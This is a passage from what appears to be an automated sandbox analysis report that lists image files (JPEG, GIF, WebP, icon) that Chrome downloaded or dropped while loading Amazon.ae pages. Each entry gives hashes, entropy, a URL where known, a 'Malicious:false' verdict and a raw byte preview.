                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3...................................................................0f0...w.o......d.k\.RJ..J...........)|EI.......u....|..nN_.........&..\.yR.[.Z=.%.6V..\..O/K.B...../...g:.a....^.k..K8`.'....=.@.....1...$....HC...{.....(.6..(T.T.T......dzp..y..*.N.md.3...9..)X.a.;..9l..DT..\.+jcKn~...cJm.Z......c@v4.p-.{S..=.....d.m.. .'7..K...D..-..u.k6C.G....J..c.....].2...|...2...S..,.......)...\..D.T@.......<.4.35.. .6&.S)m..W.d...k..G.juF..Tx.F ..Aj...G..p......#n..PRGrq/.G'.....5.MJ!rIjUD5.........cV..Y (...V.4B..R......M.bb....+.....U.>.zH..fU...Kj..n.#T.P.vc..]....$...y...........}Xy.._@....uN.m.......4..N[.;...F.-....FH.r|W ...Ykk.U5......1.`t.D............s'M..........$b$IIhL.X.rP.oidw.to5.7.\....(............k....3.t...E?...Il...bq.........!...|;.i.Y..*..........a}.Hw......{h.u..$
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D2860%26pc%3D7783%26at%3D7783%26t%3D1724264961819%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17542
                                                                                                                                                                                                                                                                      Entropy (8bit):2.247918084411713
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                                                                                                                                                      MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                                                                                                                      SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                                                                                                                      SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                                                                                                                      SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13437
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879103466630641
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/SDsx3H9AprwViqyg/iNmEsh38SCOQmF2gID0q:Lx3dKrwNy2rChm+D0q
                                                                                                                                                                                                                                                                      MD5:387052049FA9877016FF089E0420F0A4
                                                                                                                                                                                                                                                                      SHA1:0A217B7D470A41968465B5EE15A35553F364D711
                                                                                                                                                                                                                                                                      SHA-256:44A79CCF5D4C1585CF73F19CFDEDB2AF2C626EFA717EE5C2876B60BDD491D116
                                                                                                                                                                                                                                                                      SHA-512:87BF02F9139C6DABC90134D322D66FDADF0F745251FFF8DBCFD2E0B89137FE39EEA60E08E516CD2B677E2A813042ED4A9D17FB45322E22BDAAAB235177F5929C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31b7GLJLg9L._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`............................................................................P.h.7..."e.I'..jn^...Y.W+..q)..#._.H..1....1..................Y....W\_..v\.....^Z2..gz...9c.p....J.[.7."+J.]/.@............^....E5..U.wK.(.\.n.s.N.^...W..o..;..u.e_.4.......6H.kj.....B...`f...........L.cV.....u......s.v._].c_..^wNf.,......3....~....+|]....j.h2.tr._j....B.e.\:...........&...^..Z...7\..!..n.........r.J.S.8...e.........+.........S.5..g..>.I.ky.]............Uz.G.Y....r{...........{.[....#.H.$*Nxm..s..;..\.O.]^...]z..)..N.K...N.s..z...$....:.........*q.j...&....3..A.&......!...>>H=9.....k.....c.#....;...n... .{'.ej1Y+...2..,n..`...........)......}hC.i...p.....>G.m.>S......C.7..[g.`..,nI1.;..F..7sU=y.rs......s..,..f9....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 319x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23454
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957193638476291
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:vrcRdliXVwqTBZdyijwrd23RivTy8nTQG2Gq4//pDyhzIAD5+FRrr:vYLLqFZdyKK+RYTilT4//pD6TDq1
                                                                                                                                                                                                                                                                      MD5:E55E9CC189BFCF705B86593490A5A8D1
                                                                                                                                                                                                                                                                      SHA1:A679260B4C9AF3903E683E2099BBDA10579953F5
                                                                                                                                                                                                                                                                      SHA-256:EDD329DF139EDD6CD154B7EF182DB55AD46808D0BFDD702F9867FA6158B5767F
                                                                                                                                                                                                                                                                      SHA-512:1900A27707A54BD18F50B14B09EB01AD7AA83689496DFFF865C2772DD8751069514E3C5405F871AB89D1484B60EE086597D17AC6D07434F730A87756DADE6569
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.?.."..........5............................................................................._....v.d.$...qcy.R..\{q..U%>k..Bi.|..@..X.............{aW&.....5.l}.1 ._.Q..{..{...P.}....r..+.}.,.Q.'.\...>..e6...<...TE.Q..t.............w}?e,.-./.....=9.*2..M.........N.3.xtfu..H.e..n..d$i.=.~...I.b..L...........!w..`..,. H.iH5CS....<.....H.U.K..u.U-....yA.G.fY.C.5..a....Vk.".E.C.}.................)<...6Pitn.u.Qg...>.MK..8V.:.C]./N..6.;.!.....{.j......&./}_...B..T.^...........APdm..!b^Q/...>.k...x.~.@.V.....E.y+.:W...%.lS(...o}.[...,d...'.:....3U`.. .......Q...E.....].n....2...R..o.....x22....n.._!...k...5..{....%.U.._..C.wG.i8................V.x...&.....{..G.w../Z......f..p...~.P...^...Eb...1.Z.l...I....N...o.U................<.Ju.....#.r...+.q...WY+..=....Kh..K.[.W5....yf.s.a..W..W.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5216
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910288841972404
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:/aQmmjvyHK8jZImR1ejbmGlSYnljLf79vRLBVKIf02kCWrC97k4Rg:0aKq8jZ71sCuSYnlD9vRvKIf3T97k42
                                                                                                                                                                                                                                                                      MD5:629C631F53D74A20A910AF648340290B
                                                                                                                                                                                                                                                                      SHA1:AADE0E5C916EC50A3E0C4F43B4C95D9AED876887
                                                                                                                                                                                                                                                                      SHA-256:CFBF44DF29C5A0133C894401F3537455ACC07E1E40FF27004DAF10A237EB62CE
                                                                                                                                                                                                                                                                      SHA-512:A18D91FC219D97E6B7E527371A8A888F0ACC36B8F98521B8B0424113113E76FAAFDE97FFD16B0173A2BF1C4331CA24457B4EAB1AA3419C425593C44292DD649A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE._SY116_CB569183660_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................%... ..#.%.%$$&)*%.)8...........#...$...+$*.$&$$./$*#$.%$. .....$.&&%..&#.2...$#) .&-......t...."..............................................................!.1.AQ.."a...2Rq.3BS..$...Cbrs....................................................!1..AQ..."#2aq.4B...3b..............?...E..+L.(..N..~=&2.Il.<.......o...."...AV.....$..|)8`....O.}i....2-.+y).......%B.&/V...X.".V...L.".)4.].K.....8;r3VN....u.....<..be<....U.......Q.YN&lB;.Y..7..i3.D>.......'s.W..c.&Y.=.Xct.#e....Y]/.]....$h.....'mr>..\..*O....I..W....o.\%'.o...U....6....i....._..9&2..6..p.-v.S .d..1.....Id.!......)...3..t...J...". .o4...m.....6....i.igo.Z.f%1.i...7.#.j.).o..|.9N.......,....u..;..Dz..'.%_.o...U....o...U...."...#...)Ea...$y.l.=^.K.E.....*..."...ekH.7;..........CI..p..v-.;.W..zb..;.W.....{kb-.<w........X.y1 ..HV|x+.\.a.........X...Q.TSH..|..)dzZ...._.T..|.e.9..3....W.M...,...i.?.k..j[X...N..20.E.mhk.V....]...)gv...Mn..E.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):26857
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9679256349515155
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:157Pe+HUEvNCjXlTdRSwC3SStkLjy7GMi7fO:nGEUEvNC7lTdEwW3bGB2
                                                                                                                                                                                                                                                                      MD5:11460182BE50ADDD467AC2BC31019104
                                                                                                                                                                                                                                                                      SHA1:CA8FE4296865A68CB22D28F6A5C83109B82BF34F
                                                                                                                                                                                                                                                                      SHA-256:5D0625A68A69D183661117C8D96DFCE899EFFE2BEFF30BE6A2B0FD99E630F0E9
                                                                                                                                                                                                                                                                      SHA-512:7BB3AF0D861F444E074131BE0B3DB61EE85E09F4A5B83558E31ABFD799965B2A38842BC7B4A9407AC9531D41155C842BC25685D42BC052D9B4FBBD6BA983B196
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................YZk....E..X.J.t.+{c7.Y]......`k........tU..Y..t....6...MKz......wu...ld.;.x...f.)d..v...9..a..M.6.r9....sw..-t6.V....W.)..$..)P./...:...R5.......6...{M...V.:9.q+.H...[.I.Y..1..&}.}./:..|.........Y..[wRx.T.t:...[z..0f.\..\.....p...p.,..'Gc..m..9..=NvnK.o..".........{p....rF.$MH.4..+U7:...J..6..a....6..Y.`.aeL.}.C7...5&...Iw...s....J.Sindf/NQ..`..'Z....z:v.J.....C%....|\.$......5F..r...}...5....E.lx.#.g>.K..M..X....{Ib.S,z.Iw4..Z.v.A_*5..\g]....Mh.+.k?;.k....9..s.J.[lzI......n,..T.1......^I$.Y..[..6.....Z...].....M..zXy.h{...4.fz.>-..Ml..<...?E...t.=...>.{...:#.;.Q........{..l6.C....Y.%..6ie.....$.g3/.......kung....<.I....[o.....U.o..,.b.........M.^}...l|%....b......c}....FC^..r..W..Y.Y.....n.W.....<........s........oo~..U...=Ud.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 392x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1118
                                                                                                                                                                                                                                                                      Entropy (8bit):7.822378564437515
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:l2R1PpBRR6t2jJoCFcpsuEpZiLJYqEDv5Nj6UTGx6B3:l2RRj6tY/usLyrEDhR6GGYh
                                                                                                                                                                                                                                                                      MD5:949E4DB1653F922C813926715D620B90
                                                                                                                                                                                                                                                                      SHA1:34E566B56C1132CE8D50A288A92DA69F0C01A9C6
                                                                                                                                                                                                                                                                      SHA-256:F7CE43F22BD573DF7FFCF231279B82E9CFD7FB5320C65301E82F000F0050401A
                                                                                                                                                                                                                                                                      SHA-512:F2F79DB0BC0D033CFE7C7F2CCEF3F225E99910AD75ECBBADF38EAF8F0E0A79855485D9FC43A690D92856B3FCB53F62D21CBA036978E180A4E61AF8CC49F99F18
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFFV...WEBPVP8 J....,...*..Z.?...U.).!..{..1..n.[.~o.$..?._:..."Kp...HY|.K...7&..z.Nu..UX.lt..>.*_.x.+.u.G.lk8.4..!...-.Q.OE....KF=k.*OdQ.k..0D!...`.c..T.q........4....w.xK.0e.h.vq.H6..]..>.Z......V}.;...l..\g..E>.................C.._6.........h.>o....$d.v.5...9....t.d]...B....3Oi?p.!...X..p,6..b<0.x./^j...&.K6.s.%...i....t...[.m>&{|..|d.Z..............@6.BHP5.a...4........`a..z.T...P.:}....[.UC..t.... ....rm.iBO....}PoX..Y.xyv.0t..].....l....rx.v..*.r.......\]..[#R...F........G.u.b.P...be..q.g{....P.{..J.......RN..[M&...wj...Up..R.;.....n.s8.k.<[...V..w.....=....gd..h...@.......Kv..!(%~...Q.....Q..:..juJi..`.S.-.,...<..P.:<..d........Pd.....U...4.'..rm.2...4'...+...&..Iv....5.$...u..1....T...u._.....rjt.%(.v@.*.Vy(.e....D#..t.2S_..... ..'_0.U+;F.U....JcG.%..).......Q.....{b.L.....$..tc6*..^......!@..;.w5zP....6..t>6.4.7pQ....2F7.......)......b...rh7.b.....wG.g.>....mIwx..p...#.^.3!.8'.x:.@p...4.e0.T.6..l..N/...:!."\...5.X....(..c,k[..M.m.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 151x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):18984
                                                                                                                                                                                                                                                                      Entropy (8bit):7.979060230471624
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:cPc8zv20iD+g988BITQhvQOLaJUZ9whp9up4em/BA+H7CnEh:mc8zv20lgjVvQOQUZ9MM4JvH7CEh
                                                                                                                                                                                                                                                                      MD5:9C6D2FDB060818EBA05BE34E3E0E23A5
                                                                                                                                                                                                                                                                      SHA1:3071C54535079C5881BE036D2B2AE2EB89609976
                                                                                                                                                                                                                                                                      SHA-256:085B67C04E849029723FD3076E24C056838575A137EF558377E18C03F1B3C42E
                                                                                                                                                                                                                                                                      SHA-512:AF15858BB9C8C352F3343599C240FD25E23F3869783B145DAF62E391CA452652D87EB89D2358DE1B2B7EB45EBC2539CFB95F3CC09DAAA7F6720D5760AEA9A452
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@....".................................................................!."1A.2Q#aqrt....356BRUs......4bcu......$%DSTd.....C..................................................!1Aq."2a...34Qr.....#...RSb...s...c...............?..p..q.}..WS.l.L....D.....U..P..I:.=..E..T..!eC.yq.g.;.p.F9.F...|.B...W.Ac]RNGSU1?..j.5..OM.#.R...F.{..F.n..3.......r.....<}w......7....n.jT.hD."3.bB(...a.j....s."..U..`.H....T?..EY...v..#B..i.K.AR..'>^.6?.^g.\....X.......D..K...dO..!vob.S5..5-\.Y.e......3....O/V....{....bp..>...S.....B.+..Oo....g..dy.7(.#..a.vo.\.K{.<.5.D...sc..b..w...o..Q/..1...uU......]B.v.{.)f......q...8....9Q.._..5.7..Y..G<..R..n.0J.....gs..j.k.L?_.....s..[t\iw.}.....M.}hq%.,....L..8.$..6.p.6o.n.8$gB..'B..Sy.4q........m.......O,5..eIgy.......Yq..R.Gu.}...@`vq(F.u*..H9.|.]B.........A^...........5.*..[.&.CH.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30188
                                                                                                                                                                                                                                                                      Entropy (8bit):7.937716010500813
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:E/QDYcbAKXRq2uauY7cdGqyo2beFYhtVYBZOGpYv2Rtz:lE4AKcyuYiGqFFYhtVYzLpQ2Rp
                                                                                                                                                                                                                                                                      MD5:A697ED9F5CF9599064F0E91E5EE51C41
                                                                                                                                                                                                                                                                      SHA1:2DCF94A4BCDC608635DAE8498C5E4A69FF5135A7
                                                                                                                                                                                                                                                                      SHA-256:BC4F870F1CC64DB166D9CFA06089E0F6586C0EE17B2801689D9314E23BE63854
                                                                                                                                                                                                                                                                      SHA-512:A0C7305EE75F50E8F45CCB7695DAA3556EA22DC16BFAA0653242CD76164C651332191E934162A8FF533365696127F6FE072A6C5055C6D49FC47087B46495BBE5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d...........................................................................................................!..1A."2Qa..#Uq....3BRrtu........$%45678Tbces......CESW.......'Dd.&FV...Gv.........................!1..2AQRq......"3Sa.....Br....#4b....%C.............?.......@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(..........@.P(.....@.P(...g3.A..8...%I._...|.P.u....}..p.'.{.n..\......x;..i..s.....0..q_..R......gr...SM..."{[.hk.(bS.P>IM.N!..\.(.>.P.~.K[...w.O..m...W..t..o.#..Ov.]Z...G..7....W>..lS.lF....?q5."..?..`..U[T.WG...Uw.....\.U.>)......!..5.73.._._......wO......W....hTN.4w......77.{.lt..SDu..?.r3c.6.*.)......~..:#.<S.^"t..M.&[m..;J..j>..X..+R..p.....O...fvMQ..d....TBn.u...9.J\...#........r..kW.....ak....JdI.mZ...Q..f...*..1.l....~MK.#.N..'.&wh.Zj....NQ...y.X.P....q..E.IET....nX.G....X....@.P(.....@
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):40020
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9551893853251725
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xAVzpMOWNDsMJYQHx6NM4XHwVqRrOlIzSgLefko5F:6vjWvJHR6O4XZxVOg9of
                                                                                                                                                                                                                                                                      MD5:42D0F71A6F1E012DA438A3AEE9D3C788
                                                                                                                                                                                                                                                                      SHA1:A75BE3F6FFA269EA4A997368B0B149CA77850101
                                                                                                                                                                                                                                                                      SHA-256:C1CB80139DC20B88E17E79579244CB890929527034C9464D2162A3CFF30409A9
                                                                                                                                                                                                                                                                      SHA-512:8C6DF2EF4B686C9B38A15FC804D7D868C30FF4B59C6A8A0FA0F260063B65C8C85A19E3D8A6C44EF4ADF869BDAA5E1E373A30AE75F10EA244CDF15CBED0A8760B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-coghlan-s_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................Q..............................!.."1..#AQ..2UX..Raq.....$&'(B.347..59EHfuv.........................................R..........................!..1.."AQ.aq..#2....$%...&4BDRbc...36CEUVt.TXdesu.................?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1..:.6.d...b...mzj.m..9.P...v=yY..gbS.<|dse.9H..D..RUc...H..@..I:...{...Ps..8.....q..h.$...;.{.......e}1]..G.+.?..7..UK.M..5..."S...K..%..).^I}b.3NR........0i=.=._ ..[..a.vP......w.........A..Ub<...^E...V...J...oX.L.x.........G~(s...0.2kc..B...J Q.....!=e=2..@...T.2.9.#..E..d`9n..r.#..F*,_;h.R'l...4b..t.*x...............Z..u.oZ...@....W.sns.~s.p.Q..X4.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10406
                                                                                                                                                                                                                                                                      Entropy (8bit):7.815440877239833
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1EcK/6BZv/ZRARsuG4yyyyyyyyyyyyyyyyyyyyyyWooLRF2QDi1TkgvrDhwgrnp/:13ZvRmRByyyyyyyyyyyyyyyyyyyyyyWi
                                                                                                                                                                                                                                                                      MD5:9D45ACE8134857665827E17C6390963A
                                                                                                                                                                                                                                                                      SHA1:70E219F7CB2D66CB3BD8FBD99DB8AC0C5A4101AB
                                                                                                                                                                                                                                                                      SHA-256:BD212C5E3BB78A77FB36C047CF466C3B837E57E68C8E4D9189887FFF56FB69E7
                                                                                                                                                                                                                                                                      SHA-512:ED410486A51D492DE28341BB6F17200C008D6CA44A62932680B30A419EB1D98AA2CA9D11E5821C0F99ED45E11E05676BB5F40D8F55DF353AF63098968A4EBCAA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."........................................................................v...................................E....Z....9.........I...bR/.-................~..v....g#?..Z._........EUe.:.c..v..-..{..l.K.o~.vcf.u.C{{y<....U.,..U....>....<h.`.................NgW..{r..n.\at\.r{?...2....=j.o...z....u...3w.._.u...W...J..T..h.w..9R..Cg..63.H.)`................u..T..d..;.kX..{..qu-.......GF.y|M...i.../.]...*..J..7.2.]....%..(.G 6|a.c&........n_...........S.y...?.....s....-.8 .T..*..i.*.w7..%r.r.kf........5^.v..w..V...yb..3?.../4....p........................Pk.........../.................................................;.....................................................^.7....f.....+k+..s.`......]M.e..em..D..........m.j4.3+....w.o%2......................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6790
                                                                                                                                                                                                                                                                      Entropy (8bit):7.6962554568499275
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1EzpGDhVerICPnrcsyyyyyyyyyyyyyyyyyyyyyy5RhQDisMiEBkhxbq+:1Etuu/Lyyyyyyyyyyyyyyyyyyyyyyd74
                                                                                                                                                                                                                                                                      MD5:19A2A563792ED91EAF1B6EA5B8B353E9
                                                                                                                                                                                                                                                                      SHA1:6CCD5B6EE0637885FF8207A5979F39F116595DEC
                                                                                                                                                                                                                                                                      SHA-256:242624DC423E4FB2F6EF9F61668DA58F25A39A3D598C0B9C69136B859519988A
                                                                                                                                                                                                                                                                      SHA-512:64FA204CA1B640061847994E5A6514EC5FA6EBE04D7C74B114AAF132013712E3E5DD231607BC58DC5065C47F78ACB6EA433D9802F5335AEC3A871529B765360A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."...............................................x................................................\~.........3.G@.1....Q$..............q..........r.DD|{...S.YM]Y.O3u..[....N.?R1_3P.[.3q....................;.Z..5....}.c....jU.7.=.5J.s.....r^.E..[.....V....................;.._......Un..:'.:.-Z..u..._..^M.y?a.FN...s..z..........\~..........b.ubn..].....O.a.%Y.M^.....<.t.=...J.5)Y...............................................................e................................................................ ...................dw.c ............z.N......d.....X....;fo...s.SR.`....................................................................!?@....G....e...=v._...yx.....z....p[.f..;.9......o...6.............7.n..o.[=.nUp..........................+............................2`....456p 0E........../K..i-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D2884%26pc%3D7784%26at%3D7784%26t%3D1724264961820%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7783
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):38436
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946617153789945
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:v4ga02cqNTgqJAvsqcR9cWjfCGZlGVS2Bc/tCoDZMq:Ta0YTgz0x9cofZv2a/tvZV
                                                                                                                                                                                                                                                                      MD5:54BD4738515D125A08686EF5C1284A18
                                                                                                                                                                                                                                                                      SHA1:6C7E55C76C24E0DC1B22156BA8313D2FF3010B8F
